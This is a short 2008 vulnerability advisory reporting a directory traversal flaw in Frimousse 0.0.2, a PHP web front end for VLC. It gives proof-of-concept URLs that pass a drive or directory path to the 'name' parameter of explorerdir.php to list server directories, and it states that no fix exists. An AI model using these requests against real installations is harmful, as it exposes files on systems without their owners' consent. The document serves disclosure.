Frimousse 0.0.2 explorerdir.php Local Directory Traversal Vulnerability

2008-01-20 00:00:00

software : Frimousse v.0.0.2
vendor : http://frimousseweb.free.fr/

[+] Introduction
Frimousse is a freeplayer interface web written in php language , works with apache & php & VLC ( media player ) .
it is used for manage the playlist and view it in interface web with VLC media player .
Frimousse runs on Linux and Microsoft Windows.

apache & php & VLC are integred in setup of version for windows and attched with php archive for linux :

Frimousse 0.0.2 setup.exe > http://frimousseweb.free.fr/files/Frimousse_0.0.2_setup.exe
Frimousse 0.0.2 minimal.rar > http://frimousseweb.free.fr/files/Frimousse_0.0.2_minimal_install.rar

[+] vulnerability discovered by : Houssamix from H-T Team
H-T Team = HouSSaMix + ToXiC350 + RxH

[+] vulnerable version : Frimousse v.0.0.2

{ BUG } : directory traversals :

=> xpl > http://127.0.0.1:8080/explorerdir.php?name=[directory]
=> ex > http://127.0.0.1:8080/explorerdir.php?name=C:
http://127.0.0.1:8080/explorerdir.php?name=C:\Program Files

------------------------------------------------------------------------------------------
- H-T Team -- greetz : Cold-zero (hackteach.org) -Mahmood_ali (tryag.cc) - DDos & all hackers muslims --
------------------------------------------------------------------------------------------

#

Fixes

No fixes

In order to submit a new fix you need to be registered.